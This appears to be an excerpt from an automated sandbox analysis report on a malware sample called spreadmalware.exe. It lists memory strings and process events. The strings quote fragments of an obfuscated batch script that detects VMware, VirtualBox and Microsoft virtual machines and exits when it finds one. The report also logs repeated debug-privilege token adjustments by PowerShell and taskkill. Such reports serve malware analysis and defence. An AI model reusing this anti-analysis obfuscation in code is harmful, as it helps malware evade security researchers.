Source: cmd.exe, 0000000B.00000003.1440785375.000002C1DCA5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oz
Source: powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: cmd.exe, 0000000B.00000003.1424505875.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o4
Source: cmd.exe, 0000000B.00000003.1441338705.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OTH
Source: cmd.exe, 0000000B.00000003.1416998274.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o__
Source: cmd.exe, 0000000B.00000003.1437935016.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1433377082.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vX
Source: cmd.exe, 0000000B.00000003.1417425803.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o^^
Source: WMIC.exe, 0000001A.00000003.1455315227.000002894DA3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit
Source: taskkill.exe, 0000003A.00000003.1686404716.000001B277FDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMyN
Source: cmd.exe, 0000000B.00000003.1413132223.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=occ
Source: cmd.exe, 0000000B.00000003.1414500623.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oaa
Source: cmd.exe, 0000000B.00000003.1410373609.000002C1DCA5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=m22.S

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\spreadmalware.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
